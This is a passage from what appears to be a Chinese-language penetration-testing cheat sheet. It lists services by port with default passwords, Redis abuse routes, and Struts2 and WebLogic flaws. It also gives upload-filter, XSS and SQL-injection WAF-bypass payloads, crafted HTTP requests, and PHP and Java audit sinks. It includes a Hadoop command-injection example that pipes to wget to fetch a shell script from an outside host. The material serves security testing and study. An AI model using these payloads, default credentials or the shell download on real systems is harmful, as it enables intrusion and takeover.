<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/85948">https://www.anquanke.com/post/id/85948</a></li>
</ul>
</li>
<li><p>GlassFish2 / admin:admin<br>GlassFish3,4 / 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误</p>
</li>
</ul>
</li>
<li><p>5432 / PostgreSQL</p>
<ul>
<li><p>RCE</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/KevinGeorge/p/8521496.html">https://www.cnblogs.com/KevinGeorge/p/8521496.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/69153.html">https://www.secpulse.com/archives/69153.html</a></li>
</ul>
</li>
<li><p>默认账号postgres</p>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.91ri.org/13070.html">http://www.91ri.org/13070.html</a></li>
<li><a target="_blank" rel="noopener" href="http://www.91ri.org/6507.html">http://www.91ri.org/6507.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>5672,15672,4369,25672  / RabbitMQ</p>
<ul>
<li>（guest/guest）</li>
</ul>
</li>
<li><p>5900 / VNC</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/RealVNC">https://www.seebug.org/appdir/RealVNC</a></li>
</ul>
</li>
<li><p>5984 / CouchDB</p>
<ul>
<li> <a target="_blank" rel="noopener" href="http://xxx:5984/_utils/">http://xxx:5984/_utils/</a></li>
</ul>
</li>
<li><p>6082 / varnish </p>
<ul>
<li><p>CLI 未授权</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/10681.html">https://www.secpulse.com/archives/10681.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>6379 / redis</p>
<ul>
<li><p>Redis未授权</p>
<ul>
<li>ssh publickey</li>
<li>crontab</li>
<li>webshell</li>
<li>反序列化</li>
<li>开机自启文件夹写bat</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/170710.html">https://www.freebuf.com/column/170710.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>7001,7002 / WebLogic</p>
<ul>
<li><p>默认弱口令</p>
<ul>
<li>weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic</li>
</ul>
</li>
<li><p>反序列</p>
<ul>
<li><p>CVE-2018-2628</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/169770.html">https://www.freebuf.com/articles/web/169770.html</a></li>
</ul>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/WebLogic">https://www.seebug.org/appdir/WebLogic</a></p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>9200,9300 / elasticsearch </p>
<ul>
<li><p>CVE-2015-1427</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.anquan.us/static/drops/papers-5142.html">http://www.anquan.us/static/drops/papers-5142.html</a></li>
</ul>
</li>
<li><p>CVE-2018-17246</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/vuldb/ssvid-97730">https://www.seebug.org/vuldb/ssvid-97730</a></li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/search/?keywords=elasticsearch">https://www.seebug.org/search/?keywords=elasticsearch</a></li>
</ul>
</li>
</ul>
</li>
<li><p>9000 / fcgi</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/289/">https://paper.seebug.org/289/</a></li>
</ul>
</li>
<li><p>9043 / WebSphere</p>
<ul>
<li><p>Websphere8.5</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://localhost:9043/ibm/console/logon.jsp">https://localhost:9043/ibm/console/logon.jsp</a></li>
</ul>
</li>
<li><p>Websphere6-7</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://localhost:9043/ibm/console">http://localhost:9043/ibm/console</a></li>
</ul>
</li>
<li><p>后台未授权，登录后可部署WAR包</p>
</li>
<li><p>SOAP服务有反序列化</p>
</li>
<li><p>弱口令：admin / password</p>
</li>
</ul>
</li>
<li><p>11211 / memcache</p>
<ul>
<li><p>未授权</p>
</li>
<li><p>UDP反射</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://shockerli.net/post/memcached-udp-reflection-attack-bug/">https://shockerli.net/post/memcached-udp-reflection-attack-bug/</a></li>
</ul>
</li>
</ul>
</li>
<li><p>27017,27018 / Mongodb</p>
<ul>
<li><p>未授权</p>
</li>
<li><p>注入</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/83763">https://www.anquanke.com/post/id/83763</a></li>
</ul>
</li>
<li><p>phpMoAdmin RCE</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.aqniu.com/threat-alert/6978.html">https://www.aqniu.com/threat-alert/6978.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>50000 / SAP</p>
<ul>
<li><p>SAP命令执行</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/20204.html">https://www.secpulse.com/archives/20204.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>50070,50030 / hadoop</p>
<ul>
<li><p>未授权</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/173638.html">https://www.freebuf.com/vuls/173638.html</a></li>
</ul>
</li>
<li><p>命令执行</p>
<ul>
<li>host:50060/pstack?pid=123|wget <a target="_blank" rel="noopener" href="http://somehost/shell.sh">http://somehost/shell.sh</a></li>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/search/?keywords=hadoop">https://www.seebug.org/search/?keywords=hadoop</a></li>
</ul>
</li>
</ul>
</li>
<li><p>其他</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.91ri.org/15441.html">http://www.91ri.org/15441.html</a></li>
</ul>
</li>
</ul>
<h3 id="通用漏洞"><a href="#通用漏洞" class="headerlink" title="通用漏洞"></a>通用漏洞</h3><ul>
<li><p>WEB</p>
<ul>
<li><p>Java</p>
<ul>
<li><p>struts2</p>
<ul>
<li>S2-001 —  WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8 </li>
<li>S2-003 — Struts 2.0.0 - Struts 2.0.11.2</li>
<li>S2-005 — Struts 2.0.0 - Struts 2.1.8.1</li>
<li>S2-007 — Struts 2.0.0 - Struts 2.2.3</li>
<li>S2-008 — Struts 2.1.0 - Struts 2.3.1</li>
<li>S2-009 — Struts 2.0.0 - Struts 2.3.1.1</li>
<li>S2-012 — Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13</li>
<li>S2-013 — Struts 2.0.0 - Struts 2.3.14</li>
<li>S2-015 — Struts 2.0.0 - Struts 2.3.14.2</li>
<li>S2-016 — Struts 2.0.0 - Struts 2.3.15</li>
<li>S2-019 — Struts 2.0.0 - Struts 2.3.15.1</li>
<li>S2-029 — Struts 2.0.0 - Struts 2.3.24.1 (except 2.3.20.3)</li>
<li>S2-032 — Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)</li>
<li>S2-033 — Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)</li>
<li>S2-037 — Struts 2.3.20 - Struts Struts 2.3.28.1</li>
<li>S2-045 — Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10</li>
<li>S2-046 — Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10</li>
<li>S2-048 — Struts 2.3.x with Struts 1 plugin and Struts 1 action</li>
<li>S2-052 — Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12</li>
<li>S2-053 — Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10</li>
<li>S2-057 — Struts 2.0.4 - Struts 2.3.34, Struts 2.5.0 - Struts 2.5.16</li>
</ul>
</li>
<li><p>spring</p>
<ul>
<li><p><a target="_blank" rel="noopener" href="https://pivotal.io/security">https://pivotal.io/security</a></p>
</li>
<li><p>Spring-data-commons 代码执行</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/172984.html">https://www.freebuf.com/vuls/172984.html</a></li>
</ul>
</li>
<li><p>Spring MVC 目录穿越漏洞</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/665/">https://paper.seebug.org/665/</a></li>
</ul>
</li>
<li><p>Spring 视图注入漏洞</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://lonelyrain.me/2018/09/18/spring-view-injection/">http://lonelyrain.me/2018/09/18/spring-view-injection/</a></li>
</ul>
</li>
<li><p>spring-messaging远程代码执行</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/104140">https://www.anquanke.com/post/id/104140</a></li>
</ul>
</li>
<li><p>Spring WebFlow 远程代码执行</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/86244">https://www.anquanke.com/post/id/86244</a></li>
</ul>
</li>
<li><p>spring-tx.jar 反序列化</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/115849.html">https://www.freebuf.com/vuls/115849.html</a></li>
</ul>
</li>
<li><p>spring-security-oauth2 RCE</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://chybeta.github.io/2018/05/12/RCE-with-spring-security-oauth2-%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1260%E3%80%91/">https://chybeta.github.io/2018/05/12/RCE-with-spring-security-oauth2-%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1260%E3%80%91/</a></li>
</ul>
</li>
<li><p>Spring Boot Actuator jolokia RCE/XXE</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://b1ue.cn/archives/111.html">https://b1ue.cn/archives/111.html</a></li>
</ul>
</li>
<li><p>Spring Cloud Config Server 任意文件读取漏洞（CVE-2019-3799）</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://b1ue.cn/archives/126.html">https://b1ue.cn/archives/126.html</a></li>
</ul>
</li>
<li><p>Springboot swagger 控制台未授权</p>
<ul>
<li>直接访问 /swagger-ui.html</li>
</ul>
</li>
<li><p>Spring Boot Actuator 未授权访问</p>
<ul>
<li><p>接口</p>
<ul>
<li>/conditions</li>
<li>/beans</li>
<li>/configprops</li>
<li>/env/{toMatch}</li>
<li>/info</li>
<li>/mappings</li>
<li>/health</li>
<li>/auditevents</li>
<li>/loggers/{name}</li>
<li>/metrics/{requiredMetricName}</li>
<li>/heapdump</li>
<li>/threaddump</li>
<li>/scheduledtasks</li>
<li>/httptrace</li>
</ul>
</li>
<li><p>接口文档</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/ckp-henu/p/spring-boot-actuator.html">https://www.cnblogs.com/ckp-henu/p/spring-boot-actuator.html</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>…</p>
</li>
</ul>
</li>
<li><p>PHP</p>
<ul>
<li><p>thinkphp</p>
<ul>
<li><p>5.x</p>
<ul>
<li>多个代码执行</li>
</ul>
</li>
<li><p>3.x</p>
<ul>
<li>代码执行</li>
<li>SQL注入</li>
</ul>
</li>
<li><p>日志泄漏</p>
<ul>
<li>/App/Runtime/模块名/Log[s]/年_月_日.log</li>
<li>/Application/Runtime/Log[s]/年_月_日.log</li>
<li>/Runtime/Log[s]/年_月_日.log</li>
</ul>
</li>
<li><p>缓存getshell</p>
</li>
</ul>
</li>
<li><p>yii</p>
</li>
<li><p>Laravel</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.vuln.cn/6315">http://www.vuln.cn/6315</a></li>
</ul>
</li>
</ul>
</li>
<li><p>.Net</p>
<ul>
<li>…</li>
</ul>
</li>
</ul>
</li>
<li><p>服务器</p>
<ul>
<li><p>nginx</p>
<ul>
<li>0.8.* 版本以下有解析漏洞 e.g:1.jpg/.php  1.jpg%00x.php</li>
<li><a target="_blank" rel="noopener" href="https://github.com/yandex/gixy">https://github.com/yandex/gixy</a> 安全配置检查工具</li>
</ul>
</li>
<li><p>apache</p>
<ul>
<li>有解析漏洞 e.g:1.php.xx</li>
<li>HTTP 2.0 拒绝服务 <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/139042.html">https://www.freebuf.com/vuls/139042.html</a> </li>
<li>CVE-2017-15715 解析漏洞 <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html">https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html</a></li>
</ul>
</li>
<li><p>IIS</p>
<ul>
<li><p>6.*</p>
<ul>
<li>CVE-2017-7269远程代码执行  <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/130531.html">https://www.freebuf.com/vuls/130531.html</a> </li>
<li>PUT WRITE</li>
</ul>
</li>
<li><p>7.*</p>
<ul>
<li>Fast-CGI漏洞 e.g:/xx.jpg/xx.php</li>
</ul>
</li>
<li><p>CVE-2015-1635 HTTP.SYS 溢出 <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/64195.html">https://www.freebuf.com/vuls/64195.html</a></p>
</li>
<li><p>IIS加载CGI环境块伪造 <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/31444.html">https://www.freebuf.com/vuls/31444.html</a> </p>
</li>
<li><p>短文件名 <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/172561.html">https://www.freebuf.com/articles/web/172561.html</a></p>
</li>
</ul>
</li>
<li><p>weblogic</p>
<ul>
<li><p>反序列化</p>
<ul>
<li>CVE-2015-4852</li>
<li>CVE-2016-0638</li>
<li>CVE-2016-3510</li>
<li>CVE-2017-3248</li>
<li>CVE-2018-2628</li>
<li>CVE-2018-2893</li>
<li>CVE-2018-3252</li>
<li>CVE-2018-3191</li>
<li>CVE-2018-3245</li>
</ul>
</li>
<li><p>CVE-2018-2894</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_23936389/article/details/81256015">https://blog.csdn.net/qq_23936389/article/details/81256015</a></li>
</ul>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/WebLogic">https://www.seebug.org/appdir/WebLogic</a></p>
</li>
</ul>
</li>
<li><p>tomcat</p>
<ul>
<li><p>CVE-2017-12615 远程代码执行</p>
</li>
<li><p>session 注册</p>
<ul>
<li>/examples/servlets/servlet/SessionExample</li>
</ul>
</li>
<li><p>本地提权</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/115862.html">https://www.freebuf.com/vuls/115862.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>jboss</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/jboss">https://www.seebug.org/appdir/jboss</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/186948.html">https://www.freebuf.com/vuls/186948.html</a></li>
</ul>
</li>
<li><p>websphere</p>
<ul>
<li><p>Websphere8.5</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://localhost:9043/ibm/console/logon.jsp">https://localhost:9043/ibm/console/logon.jsp</a></li>
</ul>
</li>
<li><p>Websphere6-7</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://localhost:9043/ibm/console">http://localhost:9043/ibm/console</a></li>
</ul>
</li>
<li><p>后台未授权，登录后可部署WAR包</p>
</li>
<li><p>SOAP服务有反序列化</p>
</li>
<li><p>弱口令：admin / password</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><h3 id="Upload"><a href="#Upload" class="headerlink" title="Upload"></a>Upload</h3><ul>
<li><p>容器特性</p>
<ul>
<li><p>Apache1.X / 2.X</p>
<ul>
<li><p>从后向前识别，直到可识别的扩展名</p>
<ul>
<li>x.php.asd</li>
</ul>
</li>
</ul>
</li>
<li><p>IIS 6</p>
<ul>
<li><p>目录为 <em>.asp/</em>.asa等可被IIS动态执行的扩展名</p>
<ul>
<li>/1.asp/1.jpg</li>
</ul>
</li>
</ul>
</li>
<li><p>IIS7&amp;7.5 / &lt;=Nginx0.8.3</p>
<ul>
<li>上传1.jpg 访问 1.jpg/.php</li>
</ul>
</li>
<li><p>Nginx 0.8.41 – 1.5.6</p>
<ul>
<li>上传shell.php 访问shell.jpg%20.php</li>
</ul>
</li>
</ul>
</li>
<li><p>操作系统特性</p>
<ul>
<li>在shell.php后加上%80到%99，系统不识别这个范围内的字符</li>
<li>Windows会去除尾部的. shell.php……</li>
<li>shell.php::$DATA</li>
</ul>
</li>
<li><p>处理方法</p>
<ul>
<li><p>处理方式</p>
<ul>
<li><p>拦截</p>
<ul>
<li>不会通过应用</li>
</ul>
</li>
<li><p>过滤</p>
<ul>
<li>会经过应用，但会在其中的一个环节被替换为一些安全的字符</li>
</ul>
</li>
</ul>
</li>
<li><p>检查部分</p>
<ul>
<li>文件扩展名</li>
<li>文件contenttype</li>
<li>文件内容</li>
<li>图片是否完整</li>
</ul>
</li>
<li><p>检查规则</p>
<ul>
<li><p>黑名单</p>
<ul>
<li><p>asp、php、jsp等</p>
</li>
<li><p>可通过fuzz上传不在黑名单的冷门扩展名</p>
<ul>
<li>jspx</li>
<li>phtml</li>
<li>asa等</li>
</ul>
</li>
<li><p>上传.htaccess</p>
</li>
<li><p>上传.user.ini</p>
</li>
</ul>
</li>
<li><p>白名单</p>
<ul>
<li>jpg、png、doc等</li>
<li>可以通过常见的%00 或web容器/系统特性绕过</li>
</ul>
</li>
<li><p>语法规则</p>
<ul>
<li>eavl(**)  等</li>
<li>避开常用代码，使用混淆、冷门函数、反射机制等方法绕过</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>一些其他绕过方法</p>
<ul>
<li>双上传</li>
<li>在boundary 加一些字符</li>
<li>在content-disposition中添加字符</li>
<li>超长文件名</li>
<li>修改content-length</li>
<li>文件名中夹杂小语种或非英语字符</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/337">https://xz.aliyun.com/t/337</a></li>
</ul>
</li>
</ul>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><ul>
<li><p>常用操作</p>
<ul>
<li>scrscriptipt</li>
<li>大小写绕过</li>
<li>DOM XSS无视后端过滤</li>
<li>替换为HTML实体编码</li>
<li>AJAX中的响应为JSON可以考虑使用Unicode编码</li>
<li>尝试使用POST或其他类型请求</li>
<li>字符串拼接</li>
<li>字符串反转</li>
<li>利用WEB容器特性</li>
<li>参数污染</li>
</ul>
</li>
<li><p>‘ 或 “ 被转义</p>
<ul>
<li>宽字节逃逸</li>
<li>String.fromCharCode</li>
<li>jsfuck</li>
<li>eval</li>
<li>在标签属性中可以不使用</li>
</ul>
</li>
<li><p>空格被过滤</p>
<ul>
<li>%0D</li>
<li>%0A</li>
<li>+</li>
<li>标签中可用 /</li>
</ul>
</li>
<li><p>限制长度</p>
<ul>
<li><p>多段提交 part1:<script>/*   part2:*/a=1</script></p>
</li>
<li><p>&lt;svg/onload=alert(1)&gt;</p>
</li>
<li><p>短域名</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/%E7%9F%AD%E5%9F%9F%E5%90%8D%E8%BF%9B%E5%8C%96%E5%8F%B2.html">https://wooyun.js.org/drops/%E7%9F%AD%E5%9F%9F%E5%90%8D%E8%BF%9B%E5%8C%96%E5%8F%B2.html</a></li>
</ul>
</li>
<li><p>短连接 //t.cn/xxxx</p>
</li>
</ul>
</li>
<li><p>&lt;&gt;被过滤</p>
<ul>
<li>在可执行事件标签中或 script内无需绕过</li>
<li>Unicode u003cu003e</li>
</ul>
</li>
<li><p>待补充…</p>
</li>
</ul>
<h3 id="SQL-注入"><a href="#SQL-注入" class="headerlink" title="SQL 注入"></a>SQL 注入</h3><ul>
<li><p>特性</p>
<ul>
<li><p>一些web容器 提交两个同样的参数会把其拼接起来或只取一个，可以考虑使用参数污染方式绕过</p>
<ul>
<li>a=1&amp;a=’or ‘1’=’1</li>
</ul>
</li>
<li><p>iis支持unicode，可以把payloadUnicode编码再提交</p>
<ul>
<li>如s%u0065lect</li>
</ul>
</li>
<li><p>使用multipart 方式提交</p>
</li>
<li><p>sqlserver可以使用分号;结束命令</p>
</li>
<li><p>mysql 可以使用内联注释 /<em>!50000select</em>/</p>
</li>
</ul>
</li>
<li><p>一些绕过方法</p>
<ul>
<li><p>转义’</p>
<ul>
<li>宽字节绕过</li>
<li>二次注入</li>
</ul>
</li>
<li><p>常用注释</p>
<ul>
<li>/**/</li>
</ul>
<hr>
<ul>
<li>#</li>
<li>– +</li>
</ul>
</li>
<li><p>特殊字符 如%00 %0d %0a</p>
</li>
<li><p>使用空白字符</p>
<ul>
<li>SQLite3 0A 0D 0C 09 20</li>
<li><pre><code>MySQL5 09 0A 0B 0C 0D A0 20</code></pre>
</li>
<li><pre><code>PosgresSQL 0A 0D 0C 09 20</code></pre>
</li>
<li><pre><code>Oracle 11g 00 0A 0D 0C 09 20</code></pre>
</li>
<li><pre><code>MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</code></pre>
</li>
</ul>
</li>
<li><p>union(select)</p>
</li>
<li><p>select all{x users}from{x ddd}</p>
</li>
<li><p>超长注入命令</p>
</li>
<li><p>插入emoji / 小语种文字等字符</p>
</li>
<li><p>使用sqlmap tamper</p>
</li>
<li><p>一些常用注入关键字</p>
</li>
<li><p>使用冷门函数语法</p>
</li>
<li><p>科学计数语法  如 8e0union</p>
</li>
<li><p>绕过云WAF，找到真实IP注入</p>
</li>
<li><p>基于协议的绕过方法</p>
<ul>
<li><p>Chunked Transfer分块传输</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/169738">https://www.anquanke.com/post/id/169738</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/news/193659.html">https://www.freebuf.com/news/193659.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.bugbank.cn/live/view.html?id=111608">https://www.bugbank.cn/live/view.html?id=111608</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/53328.html">https://www.secpulse.com/archives/53328.html</a></li>
</ul>
</li>
<li><p>比较冷门的bypass方法</p>
<ul>
<li>添加一个换行符在第一行<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">GET &#x2F;login HTTP&#x2F;1.1</span><br><span class="line">Host: favoritewaf.com</span><br><span class="line">User-Agent: Mozilla&#x2F;4.0 (compatible; MSIE5.01; Windows NT)</span><br></pre></td></tr></table></figure></li>
<li>用小写的方法(Apache)<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">get &#x2F;login HTTP&#x2F;1.1</span><br><span class="line">Host: favoritewaf.com</span><br><span class="line">User-Agent: Mozilla&#x2F;4.0 (compatible; MSIE5.01; Windows NT)</span><br></pre></td></tr></table></figure></li>
<li>在方法之前写加一个TAB<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">    GET &#x2F;login.php HTTP&#x2F;1.1</span><br><span class="line">Host: favoritewaf.com</span><br><span class="line">User-Agent: Mozilla&#x2F;4.0 (compatible; MSIE5.01; Windows NT)</span><br></pre></td></tr></table></figure></li>
<li><pre><code>GET /login.php?pam_param=test1&amp;pam[param=test2&amp;pam%5bparam=test3
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- 使用绝对URL</span><br></pre></td></tr></table></figure>
GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- 双HOST头</span><br></pre></td></tr></table></figure>
GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- 小写HOST</span><br></pre></td></tr></table></figure>
GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- 去掉HOST的空格</span><br></pre></td></tr></table></figure>
GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- 在HOST中加一个TAB</span><br></pre></td></tr></table></figure>
GET /login.php HTTP/1.1
Host:    favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- Content-Type加一些字符</span><br></pre></td></tr></table></figure>
POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded
</code></pre>
</li>
</ul>
</li>
</ul>
<p>hello=world</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- multipart插入脏数据</span><br></pre></td></tr></table></figure>
<p>Content-Type: multipart/form-data; boundary=x</p>
<p>–x<br>Content-Disposition:<br>test1;<br>–x<br>test2;<br>–x–<br>test3;<br>name=”hello”</p>
<p>world</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">- Transfer chunked攻击</span><br></pre></td></tr></table></figure>
<p>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 0<br>Transfer-Encoding: chunked</p>
<p>3<br>hel<br>3<br>lo=<br>3<br>wor<br>2<br>ld<br>0</p>
<p>```<br>    - 参考</p>
<pre><code>    - https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet</code></pre>
<h2 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h2><h3 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h3><ul>
<li><p>代码执行</p>
<ul>
<li>eval()</li>
<li>assert()</li>
<li>call_user_func() / call_user_func_array()</li>
<li>preg_replace()</li>
<li>create_function()</li>
<li>array_map()</li>
<li>array_filter()</li>
<li>usort() / uasort()</li>
<li>反序列化</li>
<li>php 源文件拼接写入</li>
</ul>
</li>
<li><p>反序列化</p>
<ul>
<li>格式特征如：O:1:”F”:1:{s:8:”filename”;s:5:”a.txt”;}</li>
<li>unserialize()</li>
</ul>
</li>
<li><p>SQL 注入</p>
<ul>
<li>未加过滤拼接SQL</li>
<li>宽字节注入</li>
<li>注意二次注入</li>
</ul>
</li>
<li><p>文件操作</p>
<ul>
<li>fopen</li>
<li>file_put_content</li>
<li>$_FILES</li>
<li>file_get_contents</li>
<li>move_uploaded_file</li>
<li>fwrite</li>
<li>unlink</li>
<li>rmdir</li>
</ul>
</li>
<li><p>变量覆盖</p>
<ul>
<li>可以导致绕过gpc过滤</li>
</ul>
</li>
<li><p>逻辑漏洞</p>
<ul>
<li><p>安装相关</p>
<ul>
<li>安装后未自动删除目录或加锁导致可再次重装</li>
<li>通过文件删除或移动漏洞操作锁文件，来达到重装</li>
<li>安装展示页被加锁，但实际上处理安装业务的文件没有则可绕过重装</li>
<li>重装时一些内容会被写进php的配置文件里，如果知道格式，可以拼接执行php代码</li>
<li>加了锁，但只是js跳转，并没有exit或die 结束代码，导致可绕过重装</li>
</ul>
</li>
</ul>
</li>
<li><p>文件包含</p>
<ul>
<li><p>本地包含</p>
<ul>
<li><p>如果结尾被拼接.php 则需要00截断</p>
<ul>
<li>php&lt;5.3.4</li>
</ul>
</li>
<li><p>伪协议</p>
<ul>
<li>phar/zip</li>
</ul>
</li>
<li><p>包含上传图片、日志</p>
</li>
<li><p>php://input</p>
</li>
</ul>
</li>
<li><p>远程包含</p>
<ul>
<li>需要开启 allow_url_include  allow_url_fopen</li>
</ul>
</li>
</ul>
</li>
<li><p>命令执行</p>
<ul>
<li>exec</li>
<li>system</li>
<li><code>whoami</code></li>
<li>popen</li>
<li>passthru</li>
<li>shell_exec</li>
</ul>
</li>
</ul>
<h3 id="Java"><a href="#Java" class="headerlink" title="Java"></a>Java</h3><ul>
<li><p>反序列化</p>
<ul>
<li>搜索readObject</li>
<li>使用Serializable 接口</li>
<li>使用反序列化工具类</li>
<li>使用 alibaba  fastjson</li>
<li>shiro rememberMe</li>
<li>XSTREAM </li>
<li>Jackson</li>
<li>dubbo </li>
</ul>
</li>
<li><p>文件读取</p>
<ul>
<li>使用 File 相关工具类</li>
<li>使用 URLConnection 没有指明协议时可用 file://etc/passwd</li>
</ul>
</li>
<li><p>命令执行</p>
<ul>
<li>使用 Runtime.exec</li>
<li>使用 ProcessBuilder</li>
<li>使用命令行相关工具类</li>
<li>Spel \ ognl 表达式可控</li>
</ul>
</li>
<li><p>SQL注入</p>
<ul>
<li><p>ORM框架</p>
<ul>
<li>Mybatis 使用 $</li>
<li>hibernate 拼接查询</li>
</ul>
</li>
<li><p>jdbc</p>
<ul>
<li>使用 statement 类</li>
</ul>
</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://absec.cn/?p=168">http://absec.cn/?p=168</a></li>
</ul>
</li>
</ul>
<h2 id="后渗透与持续渗透"><a href="#后渗透与持续渗透" class="headerlink" title="后渗透与持续渗透"></a>后渗透与持续渗透</h2><h3 id="权限维持与提升"><a href="#权限维持与提升" class="headerlink" title="权限维持与提升"></a>权限维持与提升</h3><ul>
<li><p>提权</p>
<ul>
<li><p>Windows</p>
<ul>
